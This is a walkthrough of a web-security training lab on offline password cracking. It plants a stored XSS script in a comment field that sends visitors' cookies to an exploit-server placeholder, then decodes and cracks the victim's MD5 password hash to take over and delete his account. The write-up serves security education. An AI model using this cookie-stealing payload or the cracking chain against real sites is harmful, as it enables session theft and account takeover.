Offline password cracking

Lab description

Walkthrough

Step 1: Initial Analysis

Log in using the provided credentials (wiener:peter) and ensure the "Stay logged in" checkbox is selected. After logging in, inspect the HTTP request for the stay-logged-in cookie. The token appears to be encoded.

After logging in, inspect the HTTP request for the stay-logged-in cookie. The token appears to be encoded.

Step 2: Decoding the Cookie

Decode the token using Base64. The structure of the token is revealed as: username:MD5(password)

• Decoded Token Example: wiener:51dc30ddc473d43a6011e9ebba6ca770

Step 3: Stealing Carlos's Cookie

The goal now is to steal Carlos's stay-logged-in cookie using the XSS vulnerability in the comment section. Submit the following XSS payload in the comment field:

<script>
document.location='//<your-exploit-server>/'+document.cookie;
</script>

What this payload does is it sends the users cookies to our exploit server

When Carlos views the comment, his cookie is sent to your exploit server.

Step 4: Extracting Carlos's Token

Access the exploit server logs to retrieve Carlos's stay-logged-in cookie.

• Carlos's Token Example: Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

Decode Carlos's token using Base64: carlos:26323c16d5f4dabff3bb136f2460a943

Decoding this token, we find it's Carlos's token base64{carlos:MD5(password)}

Step 5: Cracking Carlos's Password

Use an MD5 cracker (in this case Crackstation) to crack the hash. The hash 26323c16d5f4dabff3bb136f2460a943 resolves to: onceuponatime

Step 6: Logging in as Carlos

Use Carlos's username and cracked password (carlos:onceuponatime) to log in.

• Navigate to the "My Account" page and select "Delete account."

• Enter the password when prompted and confirm the deletion.

To solve this lab we have to delete his account so we just click on that and use the password we know and that's it lab done